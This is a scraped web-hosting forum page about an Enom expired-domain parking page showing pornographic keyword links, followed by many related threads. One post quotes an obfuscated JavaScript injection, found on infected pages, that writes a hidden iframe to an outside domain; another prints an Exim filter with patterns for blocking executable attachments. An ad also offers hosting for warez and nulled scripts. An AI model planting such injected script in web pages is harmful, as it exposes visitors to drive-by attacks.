Tracking Forums, Newsgroups, Maling Lists
Home Scripts Tutorials Tracker Forums
  Advanced Search
  HOME    TRACKER    Web Hosting


Advertisements:




SuperbHosting.net & Arvixe.com have generously sponsored dedicated servers and web hosting to ensure a reliable and scalable dedicated hosting solution for BigResource.com.







Enom Is Using Porn Links And Sex Keywords On The Expired Domain Pages!!


Has anyone else had this happen with Enom?

My clients domain expired a couple days ago and his page now has links with the following keywords:

C*nt
Hairy P*ssy
Fat *ss
Big T*t
Round *ss
Monster D*ck
Big *ss T*t

I called Enom, and they're only response was, "Well why did you let that domain expire?"

I then asked for a supervisor and was told that one was not available.

Looks like its time to find a new domain reseller.


View Complete Thread with Replies

Sponsored Links:

Related Forum Messages:
SSL With Links In Https Pages...
I have an SSL cert installed to have a secure commerce area. Some of the pages have external links to non-secure sites like say [url]The padlock icon breaks and warns that there's unauthorized content. The hosting provider says it's because the external links need to be https links. Obviously that can't be done to a non-secure external site.

So the question is: do external http links break security on a secure https page? If so, is there a work around other than removing external links?

View Replies!   View Related
Expired Domain
domain has expired with no way of getting hold of the admin details to renew. So he can't afford to waste the time it'll take for the domain to come up for purchase (8-12 weeks I gather!).

He's registered a new domain and was wondering if there's a generic way of associating the new domain on the server. He uses awardspace and it says 'DNS update should be completed to have your domain working' and doesn't seem to offer many options (like maybe adding a domain alias?).

I built it for him using expression engine and it's linked to the database so it would be a real pain to have to set it all up again.

View Replies!   View Related
MX Record Domain Has Expired
I have a site mydomain-name.com that is running and the mail server for it was mail.mydomain-name.org

However the mydomain-name.org has expired and I don't want to renew it. I just want to use the .com domain and have the mail use mail.mydomain-name.com

So i created the MX records for the .com domain .. Now my question is do i have to also contact my registar for the domain and ask them to update their records so that now it points to the new MX?

I am really new at this stuff so please bare with me.. when i do an nslookup in DOS it still shows the .org as my mail server.

mydomain-name.com MX preference = 10, mail exchanger = mail.mydomain-name.org

Is this something that needs to be changed at the registrar level?

View Replies!   View Related
Registering A Domain Name That Expired
How would I go about registering a domain name that's expired about a week ago? It expired but isn't completely open, if you know what I mean.

And is there a way to pre-order it so that when it goes on the open market I automatically get it?

View Replies!   View Related
Can Awstats Be Viewed For Expired Domain
can awstats be viewed for an expired domain?

one of my domain expired week ago, I have it still under my control panel though, I didn't renew it neither have plans to renew

is it possible for me to still look at the awstats? as the awstats link stand as:
[url]
and when I use the ip address for the site it doesn't show up anything, probably it could be using different sites on the same ip

so do I have stand a chance to view awstats still ?? if yes how?

View Replies!   View Related
Domain.com And Www.domain.com Resolving To Different Pages
For some reason, for one of my sites, www.domain.com resolves correctly -- however, domain.com resolves to the Cpanel default page.

I've set up this domain the same way I set up my others. Also, I checked the DNS entry and see nothing wrong w/ it. Here's a screenshot of my DNS domain zone file:
[url]

View Replies!   View Related
Contained Spam Keywords
Issues with emails with attachments getting filtered out.

I had put an attachment in an email that never get to it's destination. There were 2 flash files and a gif attached to it. That same email was send back today 2007-04-10 at 14:04 and was filtered out again.

Also, yesterday two emails were sent. Both emails had an mp3 file within them and were filtered out.

Got this automated response after sending an email with a .eml file in attachment :

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

Code:
testuser@local-domain.com
This message has been rejected because it has
a potentially executable attachment "Bigbox + intersticielle.eml"
This form of attachment has been used by
recent viruses or other malware.
If you meant to send this file then please
package it up as a zip file and resend it.
EXIM filter logs:

2007-04-10 10:31:32 1HbIJd-0002z1-S5 from testuser@local-domain.com contained spam keywords

Confirmed:
- spam assasin disabled
- spam box disabled
- no email filters set up
- mx entry correct
- unlimited mail disk quota

My /etc/antivirus.exim:

Code:
# Exim filter

if not first_delivery
then
finish
endif

if ${length_80:$header_date:} is not $header_date:
then
fail text "This message has been rejected because it has

an overlength date field which can be used

to subvert Microsoft mail programs

The following URL has further information

[url]
seen finish
endif

if $header_from: contains "@sexyfun.net"
then
fail text "This message has been rejected since it has

the signature of a known virus in the header."
seen finish
endif
if error_message and $header_from: contains "Mailer-Daemon@"
then
# looks like a real error message - just ignore it
finish
endif

if $header_content-type: matches "(?:file)?name=("[^"]+\.(?:ad[ep]|ba[st]|chm|cmd|com|cpl|crt|eml|exe|hlp|hta|in[fs]|isp|jse?|lnk|md[be]|ms[cipt]|pcd|pif|reg|scr|sct|shs|url|vb[se]|ws[fhc])")"
then
fail text "This message has been rejected because it has

potentially executable content $1

This form of attachment has been used by

recent viruses or other malware.

If you meant to send this file then please

package it up as a zip file and resend it."
seen finish
endif
# same again using unquoted filename [content_type_unquoted_fn_match]
if $header_content-type: matches "(?:file)?name=(\S+\.(?:ad[ep]|ba[st]|chm|cmd|com|cpl|crt|eml|exe|hlp|hta|in[fs]|isp|jse?|lnk|md[be]|ms[cipt]|pcd|pif|reg|scr|sct|shs|url|vb[se]|ws[fhc]))"
then
fail text "This message has been rejected because it has

potentially executable content $1

This form of attachment has been used by

recent viruses or other malware.

If you meant to send this file then please

package it up as a zip file and resend it."
seen finish
endif

if $message_body matches "(?:Content-(?:Type:(?>\s*)[\w-]+/[\w-]+|Disposition:(?>\s*)attachment);(?>\s*)(?:file)?name=|begin(?>\s+)[0-7]{3,4}(?>\s+))("[^"]+\.(?:ad[ep]|ba[st]|chm|cmd|com|cpl|crt|eml|exe|hlp|hta|in[fs]|isp|jse?|lnk|md[be]|ms[cipt]|pcd|pif|reg|scr|sct|shs|url|vb[se]|ws[fhc])")[\s;]"
then
fail text "This message has been rejected because it has

a potentially executable attachment $1

This form of attachment has been used by

recent viruses or other malware.

If you meant to send this file then please

package it up as a zip file and resend it."
seen finish
endif
# same again using unquoted filename [body_unquoted_fn_match]
if $message_body matches "(?:Content-(?:Type:(?>\s*)[\w-]+/[\w-]+|Disposition:(?>\s*)attachment);(?>\s*)(?:file)?name=|begin(?>\s+)[0-7]{3,4}(?>\s+))(\S+\.(?:ad[ep]|ba[st]|chm|cmd|com|cpl|crt|eml|exe|hlp|hta|in[fs]|isp|jse?|lnk|md[be]|ms[cipt]|pcd|pif|reg|scr|sct|shs|url|vb[se]|ws[fhc]))[\s;]"
then
fail text "This message has been rejected because it has

a potentially executable attachment $1

This form of attachment has been used by

recent viruses or other malware.

If you meant to send this file then please

package it up as a zip file and resend it."
seen finish
endif

# START
# Filters all incoming an outgoing mail


logfile /var/log/filter.log 0644
## Common Spam
if

# Header Spam
$header_subject: contains "Pharmaceutical"
or $header_subject: contains "Viagra"
or $header_subject: contains "Cialis"
or $header_subject: is "The Ultimate Online Pharmaceutical"
or $header_subject: contains "***SPAM***"
or $header_subject: contains "[SPAM]"

# Body Spam
or $message_body: contains "Cialis"
or $message_body: contains "Viagra"
or $message_body: contains "Leavitra"
or $message_body: contains "St0ck"
or $message_body: contains "Viaagrra"
or $message_body: contains "Cia1iis"
or $message_body: contains "URGENT BUSINESS PROPOSAL"
or $message_body matches "angka[^s]+[net|com|org|biz|info|us|name]+?"
or $message_body matches "v(i|1)agra|vag(i|1)n(a|4)|pen( i|1)s|asu|seks|l(o|0)l(i|1)ta|dewacolok"

then
# Log Message - SENDS RESPONSE BACK TO SENDER
# SUGGESTED TO LEAVE OFF to prevent fail loops
# and more work for the mail system
#fail text "Message has been rejected because it hasn
# triggered our central filter."
logwrite "$tod_log $message_id from $sender_address contained spam keywords"

seen finish
endif

# END
# Filters all incoming an outgoing mail

View Replies!   View Related
Keywords Filter, CPanel Server
I want to filter some keywords showing on the website.

For example,some adult keywords or some force keywords,I want apache change it to * or close the webpage.

I use cPanel/WHM but I find no place to do the setting.

View Replies!   View Related
How To Password Protect Web Pages, I Can Protect Directories But Can't Put Pages In
i did make a big message on here but it deleted when i back spaced

my website is aviation cafe dot net / sample and i need you to help me with password protecting a webpage, i wanted the address to be / the silver sword and definitly not to look like it does now.

username: webforum
pass: password

View Replies!   View Related
Dedicated Server With Porn OK
Its been sometime since I posted here. I'm in London and had been negotiating with my current host for sometime about getting a fully managed dedicated server which would also allow smut to be hosted on it as I want to get into hosting for swingers and escorts - Anyway - the best deal I could get there, which was about 3 yrs ago, and I think a damn good one was for an annual fee of £1000 - £1200 which included an 80 gig server plus all the other no frills you might expect - now that I have found a business partner and have the money I find that my host has migrated the service to Florida and to cut down bandwidth they are no allowing porn anymore!

Can anyone out there offer me some options? I run serveral mainstream sites already.

Ideally I would like the support to be within the UK if possible, or at least very good. I need a host who is porn friendly and would prefer to not have to worry too much about the 2257 **** that the USA have if possible - although I can provide that, its just I hate Big Brother!

View Replies!   View Related
Servint - Serving Porn On My Sites
What is up with servint?

I have domains and a vps through them.

The vps is now serving up porn on all the sites.

When I call servint they say I don't own the name but a whois shows i DO INDEED own the name for another year and it is registered to me and they are the registrar!!!

The portal user/pass suddenly stopped working so I can't even put in a support ticket

All I get is a message machine ... does anyone know if servint staff ever come on this board.

It has probably been hacked but it is pretty disturbing when they say I don't own the domain but it is CLEAR THAT I do own it.

View Replies!   View Related
Old Address Direct To Porn Sites
I had a site with admo.net. To my surprise the name registration was done in their name and not mine so domain name cannot be taken with you. When your hosting date expires the domain was directed the day it expired to a porn site without a renewal notice or warning. It was not until after I requested the name only renewal that a renewal email arrived. The date on the renewal was marked due over 10 days after it had already expired. In the mean time all the visitors looking for me were directed to porn links.

View Replies!   View Related
SSL Certificate Inside Cpanel Expired
I connect to my email on my dedicated cpanel/whm server by TLS/SSL (similar to instructions here: [url]..same ports, etc.)

Today I login & get a "This server's certificate expired"

But it didn't. I purchased a NEW one June 1st. Why is thunderbird grabbing my old ssl cert? The website's https:// works perfectly.

I also checked the server ssl self-signed certs and all are up to date.

View Replies!   View Related
Dedicated Server That Allows Porn / Adult Content?
I have a customer interested in a dedicated server that allows porn to be hosted on it. What locations/providers do you recommend for something like this?

View Replies!   View Related
Automatic Suspend Expired Account In Cpanel
who knows a way to modify an expiration date for created accounts in Cpanel ver.11 and also a way to suspend an account which is expired.

I want to manage this automatically by cpanel. or even there is any tools or module which is available.

View Replies!   View Related
Enom Down
I'm moving my domains away from there, but in the meantime I still need to access some,

I am getting the following message:

Quote:

Unscheduled Maintenance

Our site is currently undergoing an unscheduled maintenance to upgrade our systems in order to better serve you.

View Replies!   View Related
Webhost For Media Oriented (not Porn) Web Site?
I have a media orient web site with a lot of videos (.WMV files), most of them are from PC based racing games, a few other games, plus videos of radio control models, racing cars, etc. Currently, there is about 9GB of media on my web site and traffic is about 20GB to 200GB / month (activity increase when I add videos from a newly released game). Note this is a hobby web site (not a business site, no ads, or ad related links).

My current web host provider, ipower, recently switched to a much small number of servers with many more users per server, and now they throttle download rate to about 350 kilo-bytes / second. Before the change, download rates ran over 2 mega bytes / second.

If curious as to the content, my web site is here: ...

View Replies!   View Related
Good Web Hosts That Allow Adult / Porn / Pornography?
My next website will be a sort of adult orientated social networking type site that will allow users to upload adult pics ect.

Most of the good recommended hosts such as : medialayer, Rochen, Known Host and so on don't seem to allow pornography of any kind.

Are there any as good as those that do allow this kind of thing?

View Replies!   View Related
Info About ENom.com
I made a couple of search on this forum but that did not fetch me what i exactly wish to know.

Obviously, the first question which has been asked millions of times
1. How good is their server performance?I have my site hosted from Godaddy.com. When i go for speed test of my site i always found the speed to be about 0.40 seconds while google and yahoo being 0.01 and 0.04 respectively.

2. I am need JAVA hosting. enom.com seems to offer every thing under one hosting plan which is really good for me.

3. I tried seeing their help files to find out how many times their TOMCAT restarts a day but i guess their help files are restricted to only registered user. Can some one please tell me is there a way to manually restart Tomact in enom.com?

4. The number of MySQL database is not important for me. What i am looking for is how much data can i save into each database. Godaddy.com offered 25 databases, for which i was pretty happy but latter on i figured out that the amount of data i can store is limited to 200 MB only. which is really sad!

View Replies!   View Related
Enom Hosted Exchange
i have a domain with enom.

the nameservers point to my server.

i now want to use enoms hosted exchange service for this domain, but retain the website on my webspace.

how would this work, using my own webspace and enoms hosted exchange?

do enom take care of it all for you?

View Replies!   View Related
Kiss My Firewall And Enom
When I have Kiss My Firewall running on CentOS 4, connections to reseller.enom.com time out when checking or registering a domain name. Ports 80 and 443 are open,

View Replies!   View Related
ENom Complaints E-mail
I'm having a bad experience with someone in customer support, for eNom's shared hosting account (thread started on WHT a short while ago).

Drawn a blank obtaining complaints email address for eNom customer support or better still management?

View Replies!   View Related
RC Managed DNS With Enom
I have a reseller account with Reseller Club (for domain registration) and enom (for web hosting).

I have added A record pointing enom web hosting, when I check the DNS status it shows,

Found NS record: ns1.[mydomain], was resolved to IP address by j.gtld-servers.net

Error fetching SOA from 000.000.000.000, request timed out. Probably DNS server is offline

how to configure Name server in Reseller club to point enom.

View Replies!   View Related
SSL Certificates From ENom
Anyone else having trouble getting them to work correctly? I do outsourced support for a few different hosts, as well as handle issues for ours, and there seems to be an unreasonable amount of eNom certificates failing to install correctly.

I'm not sure why they are bombing (module mismatch, etc.), but I was wondering if anyone has any insight on this. This definitely isn't an issue with how they are being installed. No other SSL Certificates that we deal with are having as many problems.

View Replies!   View Related
Why Non-ssl Pages Are Blank, Ssl Pages Work
I am moving to a new server. At first the [url]version of the site was fine. I had trouble getting [url]working. Once I had the path to the certificate file correct, I was good to go. So, I started moving data. I also ran some updates on the new server (installed mysql, php, related pkgs). I don't know when the [url]pages stopped working, but I didn't realize it until I had everything moved over and tried to go live. The pages are completely blank. If I view source, I get this: ....

View Replies!   View Related
How Are They Doing This With Links In My Stats
When I go through my AWStats under "Links from an external page (other web sites except search engines)" I see several domains that have linked to me. When I visit these sites they are generally porn and drug sites that do not contain a link. Some of the sites redirect you to other sites. When you look up these domain names they are all from Russia.

These sites account for mulitple hits as high as +14.5%. These sites do not represent the content on my sites.

My questions are.

How do I stop this? I have found banning IP addresses does nothing.

How are they doing this?

Can this lead to your site being blacklisted?

View Replies!   View Related
Script To Changes Links
My company hosts our primary website on a Linux box. We link to a third party for term life quotes. The quoting server is going down this weekend and I need to change the links to their page to one on our site. Unfortunately, our content management server is also down while we re-organized our network.

I have SSH access to the live server. Can someone tell me how to search for a specific href in files under the document root and automagically change them all? It would save me the time of finding each one and changing it by hand.

View Replies!   View Related
Symbolic Links
I have a linux sserver. And I mount a drive from a windows server. The mount point is /mnt/winmirror.

I make 2 test folders, test1 and test2 under /mnt/winmirror. Then I create a symbolic link in test1 to test2. In -s /mnt/winmirror/test2 linktotest2.

But there is an error message:

ln: creating symbolic link `linktotest2' to `/mnt/winmirror/test2': Operation not permitted

Any body know why I can't create symbolic link in this situation?

View Replies!   View Related
External Links
have a few different list of links in my link section for eg one page i give people links to about 20 or so games company where they can buy from. another has a small list of forums people can join eg, another list of places that i shop at.i do not have any reciprocal links with any of them and only included them cos i thought it would be handy for my readers. now can i leave the links or should i take it all off because all these external links would not help in my pr? there seems to be so many conflicting opinions

how many external links can you have in a page before it's bad for you.

idea to just use robots.txt on all these pages to be on the safe side?

View Replies!   View Related
How Long Does It Take To Set Up An Enom Account
I got one free with my host, but it seems tohave been over 24 hours since i ordered it (via my host) how long does it take, am i being impatient, or is it just the host not bothering to sort it out?

View Replies!   View Related
Hiding Affiliate Links
I'm creating a site similar to slickdeals & bensbargains and I'm trying to find a script that I can integrate into my text editor (tinymce.moxicode) that will create a tiny url as well as the redirect page automatically using php & mysql.

Looking at the following mouseover link from slickdeals:

slickdeals dot net/?pno=6999&lno=1&afscr=1

where it always starts with slickdeals dot net/

?pno=6999 each deal added gets a +1 to this number. The next deal would be 7000.

&lno=1 each link within a particular deal. Where the first link to the deal is lno=1, the next link (rebate) would be lno=2, etc.

&afscr=1 I'm not sure what this is for, I moused over a bunch of their links and they are all =1.

But the bottom line effect is that when you click on one of their links, it brings you momentarily to a blank page and then bestbuy dot com/etc/etc/etc comes up. The user never sees the funky affiliate link.

The best I've found so far is gentlesource dot com/short-url-script/

View Replies!   View Related
Enom Can't Update The Glue Records For A Nameserver
I have a nameserver which recently had it's IP updated.

I've updated the A record but I also need to update the glue records.

Enom say they can't do this.

If this is true (and they weren't just fobbing me off they phone) how can I update the glue records?

View Replies!   View Related
Affordable Hosting SHARED-RESELLER Warez Linking - Nulled Script - Legal Porn
BEST RELIABLE HOSTING, affordable hosting

ALLOWED: warez linking - nulled script - legal porn

warez linking allowed
nulled script allowed

Host Unlimited Domains
Unlimited Sub Domains
Unlimited Email, MySQL, FTP
PHP5, MySQL5, CGI, Perl5
DDOS Proof, ionCube, Ruby
99.99% Uptime Guarantee
cPanel® 11, WHM, Fantastico
Web Hosting Control Panel
MS Frontpage WebSite Hosting
ImageMagick 5.5.2 Support
Unlimited Email and FTP Accounts
Fast, Free 24/7 Tech Suppor
Reseller Hosting Available
2 Web Based E-Mail Programs
Streaming Audio/Video Hosting


SUPER 12$ year
5 Go Storage
30 Gb Transfer
Control Panel

EXPERT 24$/year
20 Gb Storage
100 Gb Transfer

EXPERT 36$/year
50 Gb Storage
600 Gb Transfer


GOLD HOSTING
»FREE DOMAIN NAME
» 100 Gb Disk Space
» Unlimited Bandwidth
50 $/YEAR


RESELLER HOSTING

w w w .azhosty .com

View Replies!   View Related
Default Relative Links Go To HTTPS
One of the machines we have at LW crashed 2 weeks ago.

we use relative links for pages and images throughout our site, but now in the new machine, every relative link request gets sent to HTTPS instead of a regular HTTP request.

View Replies!   View Related
Redirect All The Links From Http To Https
I have to redirect all the links from http to https.

IS there some setting on IIS.

SSL is installed on server.

View Replies!   View Related
How To Hide Nameserver, Using ENom DNS Dns1.name-services.com
I have a dedicated server using one of my domain as the nameserver; basically ns1.mydomains.com / ns2.mydomains.com

Lately my sites are getting hacked and want to use DNS nameserver provided by the registrar, eNom to hide my domains. For example, if I use dns1.name-services.com/dns2.name-services.com or ns1.domaincontrol.com (GoDaddy), it will be harder for people to track of what domains I own, etc.

Once I change the nameservers to dns1.name-services.com, what do I need to do on the dedicated server/WHM side? A records, CNAME, MX records?

View Replies!   View Related
Cheapest SSL Certificate Suitable For E-Commerce From ENom
I've always been a seller that's primarily used PayPal only.. However, on my next online venture, we're stepping it up a grade and will be implementing a full CMS system, an e-commerce cart module (or platform in its entirety) and security through SSL certification.

I've taken a look at the SSL certificates offered by eNom and was wondering what you all thought would be the cheapest certificate that is suitable and ready for e-commerce that will process credit cards, etc.

Certainly the more expensive, I can assume is more feature and security laden, but just wanted to know what you all feel is a good balance of price, security and readiness for e-commerce.

View Replies!   View Related
Uploading Http Links To Ftp Server
tried to download files from http links to my ftp server. i looked all over the forums but could not find any services. google spitted out this one. [url]Well, it really does help to upload http links to an ftp server and move files from one ftp server to another. does anyone know other services or free scripts that help to do this?

View Replies!   View Related
Links Not Working In Xamp On Local But Work In Production
I installed XAMP and copied my entire site down and put it in htdocs. I can see the index page, but the page's links and css are broken.

My local site:

//localhost/libweb/

my production environment:

//sitename.edu

and the physical address on the box is:

f:inetpublibweb

View Replies!   View Related
Not Working Links /cpanel /whm Only Ports 2082 2086
On my server not works links www.server.com/cpanel and www.server.com/whm only ports www.server.com:2082 www.server.com:2086 how repair this?

View Replies!   View Related
Ecatel = Colinks = Iqarus | Links With Russian Business Network (RBN)
Yes, this is probably my first and last thread about reviews about any service provider.

I personally hate bashing people and always tend to resolve matters on my own with providers/customers without involving 3rd party (current/past customers and providers can acknowledge this) but this time its gone way out of the line and this thread is purely meant as a negative review of Ecatel or Colinks or Iqarus or whatever you call this slimy set of people. I am done speaking soft and trying to act nicely to them.
What made me go this far? If a provider accepts the fact that he is wrong after proving countless number of times, I would not make this thread. Heck, I would not make this thread if they did NOT agree that its their fault. This case is gone so far that these people blame me (personally) for all the crap that they have dug. Now its time to bury them in the same pit.

They have ripped me of for around 5000 EUR worth of business every month. I won't go into details but the reason for cancellation is described later in this thread. They have ignored all later attempts of contact after terminating services with us. So I have no clue as to what their problem was.

Coming to the thread title now... does anyone know about the fact the Ecatel was formerly known as Iqarus and before that as Colinks. If there are any senior/old members on this forum who can comment on it, I am sure they can provide quite a number of incidents where this Company has scammed 100+ number of clients.

Here are few links right here on WHT that shows Iqarus's scams:[url]
9 100s of threads claiming their history to be fraudulent

For proof here is one:[url]

Quote:

213.202.214.0/32
Removed ecatel.net SR04
2008-09-28 21:19:58
SBL44871 ECATEL-AS AS29073 = iqarus.com = Colinks = as29073.net
89.248.160.0/20
Removed ecatel.net SR04
2008-09-28 21:20:11
SBL44870 ECATEL-AS AS29073 = iqarus.com = Colinks hosting spammers

At this point it is very easy to tell what kind of a shaddy organization this is. Sending SPAM emails consecutively and become known for it... hmmm.

Okay, lets all assume that now Ecatel is a clean organization. May be the bad habits have been left to die with the two old fraudulent Companies. But NO! They are the same set of people and have turned even worse... Now they are in direct relationship with the a Russian cyber-gang known as the Russian Business Network (RBN). I make a big claim here because the RBN is probably wanted by most law-enforcement authories around the world. You can read more about RBN here, here and here (please read this in particular).Now here are my findings depicting RBN and Ecatel's affiliation:[url].[url]
Here is a detailed explaination of their recent outage which also shows their relationship with the RBN AND their slimy activies (I love this link):[url]

You can just Google "rbn ecatel" and find thousands of results deeming this organizations links with the RBN. I am now not the sole person having these facts. Most people involved with networking security know about this and now its time for the layman to know too.

At this point I proved that it is safer to keep away from Ecatel so that:

- you can stay away from all RBN related prosectutions

- prevent yourself from being scammed (colinks/iqarus quote)

I know pretty well how Ecatel is going to react/reply to this thread. Obviously for starters put up a pile of garbage info they will generate on me with no factual evidence whatsoever (they have gone far enough as to mention I have links with RBN and thus my rant here). AND completely ignoring to defend themselves of the claims I have made above (its their specality on escaping such blames).

I urge everyone of you to first ask Ecatel for a response for the above claims and then (if they last that long; they can open a new thread, WHT loves good content) they can hammer me with all the garbage they will pile up. Notice here that, all my proof of evidence is directly quote from 3rd party reliable websites and not from my email inbox that only I can verify. Ofcourse Ecatel will ignore this statement and continue to hammer me with falsified information, but I have another reliable 3rd party website that I can use as protection (as atleast he says the situation the same way as I do).[url]

I hope you all make proper and informed decisions. Oh btw, according to Dutch law (or perhaps every country's law) an Internet Service Provider needs to have an agreement with their client about what they are allowed to run on their network (known as Terms of Service/Acceptable Usage Policy) and Ecatel has none. These people can be shutdown easily because of just this, forget all the RBN and crap!

Its 4:30 AM here. Will go and get a cup of coffee and wait for replies. Will definite get my lawyer working on these guys. I am hell determined to close this case for good. And extremely sorry for the long thread...

View Replies!   View Related
Links Files In Linux (file.txt For File.php)
Today I found some cstomer on the servers make a link for named it file.txt and link it to other customer php file.

so that customer have the ability to show the other custoer file content when visiting the url because it is a text wile originally it is a php file.

the php file was a config file, so now he know the database password , and because he is in the same server he can use that databse.

the question , how to avoide this prolem in the future?

notes , the SuExec is rnning and the open_basedir protection is enabled, but the problem still exists.

View Replies!   View Related
The Timeout SpeciMod_sec: The Timeout Specified Has Expired [severity "EMERGENCY"]
at my logs, i can see this timeout error caused my mod_security at my rhes 4 server.


Code:
mod_security-message: Access denied with code 403. Error reading request body, error code 70007: The timeout specified has expired [severity "EMERGENCY"]

I didnt specify any mod sec rule about "timeout", what timeout is this about?

View Replies!   View Related
Phish Pages
I have these few old accounts(websites) that has history of being phish attacked. The problem is like this. When I transfer them to newer server using whm backup transfer in most cases hacker can still upload phish pages BUT if I recreate the account and moved old the files manually to that new account and server phish attacked is gone. Any idea why this is happening? Probably old cpanel files that causes this? where do I start? For some reasons I cannot just recreate the account then do it manually in behalf of the clients. Some sites are somehow complicated if I do it manually.

View Replies!   View Related
Pages Back Up
I just recently changed the server my website was being hosted on (my website being a small hosting-biz) and my site has been replaced by 1and1's temporary landing page. The thing is I have no idea or experience on what to do to put my pages back up. I don't even think I have them saved anywhere...

View Replies!   View Related
Linking Pages With Different Hosts
If the user links to a different page and domain hosted by the same company is the browser experience quicker? If I have 2 webpages with 2 different hosts and wish to link them is there any meaningful slowdown for the user, to transfer to different pages with different hosts.

Do all the pages of a domain need to be hosted from the one host?

View Replies!   View Related
Infected Web Pages
150 php pages infected codes like.... As we do not have a backup..is there any commands to remove it

<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,11 4,34,59,11 8,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61 ,34,105,10 2,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115, 114,39,43, 39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32 ,119,105,1 00,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,39,43,39,97,109,101,62,39,41,59,32,102,1 17,110,99, 116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,32,109,110,98,113,61,52,51 ,48,52,49, 56,50,52))</script>

Is there any command to search and replace this whole string from files...normal sed is not seems to be working with these symbols.

View Replies!   View Related
Can't View Man Pages
I can't get any man pages. For some reason when I try to use it, I continue to get this error:

Code:
XXX
XXX WARNING: old character encoding and/or character set
XXX

View Replies!   View Related
302 Pages And Such Things
I'm not sure if this is correct place to post this, but I had a look round and couldn't see anything particularly appropriate.

Can someone point me in the right direction... give me a link or some advice... I want to learn about 302 pages, 301 pages and other types of pages.

I read that 302 pages may mean a website's traffic is being redirected by someone else...?

Obviously, I want to know if someone is sneakily redirecting my traffic... and I need to protect myself against it.

View Replies!   View Related
Random Blank Pages
Seems my site is getting random blank pages. I did some research and maybe but not sure its related to open files.

[root@dedicated ~]# cat /proc/sys/fs/file-nr
3264 0 900000

Is this something to worry about? I just did a reboot and it did it.

Current Time: Saturday, 20-Jun-2009 00:18:53 EDT
Restart Time: Saturday, 20-Jun-2009 00:11:17 EDT
Parent Server Generation: 0
Server uptime: 7 minutes 36 seconds
Total accesses: 106629 - Total Traffic: 898.2 MB
CPU Usage: u294.39 s37.64 cu2.91 cs0 - 73.5% CPU load
234 requests/sec - 2.0 MB/second - 8.6 kB/request
590 requests currently being processed, 99 idle workers

Server outputs 53mbps constantly.

View Replies!   View Related
WHM 404 Pages
one minute i login to WHM and it's fine...the next I get a 404 error

View Replies!   View Related
404s On Dynamic Pages Only
I have a problem with a site that I'm hosting on a managed dedicated server - I'll try to explain this as simply as possible!

From my office I seem to have a problem viewing dynamic pages on the site.

- The HTML index page loads fine
- Internal dynamic PHP pages throw up 404s
- Other PHP pages/sites on the same server are fine
- The pages load fine using a proxy browser
- I've cleared my cache which made no difference
- From other locations (home) I have never had the problem

I'm obviously worried that I'm not the only person having these problems.

The fact that the site loads fine through a proxy indicates that there's not a problem with the server,

However I'm confused that it's not a local problem as the HTML pages shouldn't be loading either right?

View Replies!   View Related
Custom Error Pages
I am trying to control access to an asp page by using windows resource groups. The virtual directory in IIS has both 'Integrated Windows Authentication' and 'Basic Authentication' checked.

When an unauthorized user tries to access this page, it prompts thrice for the user ID and password before going to the 'user not authorized' page. I want it to display the error the very first time an unauthorized user tries to access this page and not ask him thrice before throwing the error page.

The operating system being used is Windows 2003 server.

View Replies!   View Related
Copyright © 2005-08 www.BigResource.com, All rights reserved